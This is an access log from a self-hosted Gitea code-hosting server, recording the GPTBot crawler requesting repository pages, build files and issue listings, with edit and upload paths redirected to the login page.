"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/tsconfig.json" +[17/Feb/2026:16:59:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_Final.spec" +[17/Feb/2026:16:59:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_Final.spec" +[17/Feb/2026:16:59:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_Final.spec" +[17/Feb/2026:16:59:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_Final.spec" +[17/Feb/2026:16:59:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_VeryGood.py" +[17/Feb/2026:16:59:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_VeryGood.py" +[17/Feb/2026:16:59:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_VeryGood.py" +[17/Feb/2026:16:59:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_VeryGood.py" +[17/Feb/2026:16:59:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10876] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/my_database.db" +[17/Feb/2026:16:59:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21443] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/Gitea_Manual.md" +[17/Feb/2026:16:59:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17365] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/Gitea_Manual.md" +[17/Feb/2026:16:59:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10876] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/my_database.db" +[17/Feb/2026:16:59:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17366] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/Gitea_Manual.md" +[17/Feb/2026:16:59:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fTestApp.dir" [Client 74.7.227.38] [Length 69131] [Gzip 13.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:59:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastcomment&state=open&type=all" +[17/Feb/2026:16:59:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:16:59:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=recentupdate&state=all&type=all" +[17/Feb/2026:16:59:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10156] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=nearduedate&state=open&type=all" +[17/Feb/2026:16:59:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=open&type=all" +[17/Feb/2026:16:59:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastcomment&state=all&type=all" +[17/Feb/2026:16:59:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastupdate&state=all&type=all" +[17/Feb/2026:16:59:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10159] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=open&type=all" +[17/Feb/2026:16:59:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=open&type=all" +[17/Feb/2026:16:59:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 9976] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=recentupdate&state=all&type=all" +[17/Feb/2026:16:59:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=closed&type=all" +[17/Feb/2026:16:59:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj" [Client 74.7.227.38] [Length 11755] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal" +[17/Feb/2026:16:59:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:16:59:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14743] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:16:59:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14711] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:16:59:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14742] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:16:59:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&state=all&type=all" +[17/Feb/2026:16:59:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10048] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build" +[17/Feb/2026:16:59:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10050] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build" +[17/Feb/2026:16:59:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10049] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build" +[17/Feb/2026:16:59:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10047] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build" +[17/Feb/2026:16:59:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&state=all&type=all" [Client 74.7.227.38] [Length 9945] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:16:59:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj" +[17/Feb/2026:16:59:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj" +[17/Feb/2026:16:59:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/OpcUaMinimal/obj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj" +[17/Feb/2026:16:59:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/OpcUaMinimal/obj" +[17/Feb/2026:16:59:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/obj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj" +[17/Feb/2026:16:59:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/obj" +[17/Feb/2026:16:59:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.nuget.cache" [Client 74.7.227.38] [Length 12391] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj" +[17/Feb/2026:16:59:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" [Client 74.7.227.38] [Length 11987] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj" +[17/Feb/2026:16:59:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:16:59:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9953] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:59:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9954] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:59:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10660] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:59:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9953] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:59:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9952] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:59:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10113] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:59:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10112] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:59:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10114] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:59:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10112] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:59:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/project.nuget.cache" [Client 74.7.227.38] [Length 9828] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.nuget.cache" +[17/Feb/2026:16:59:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/project.nuget.cache" [Client 74.7.227.38] [Length 3389] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.nuget.cache" +[17/Feb/2026:16:59:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api" +[17/Feb/2026:16:59:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 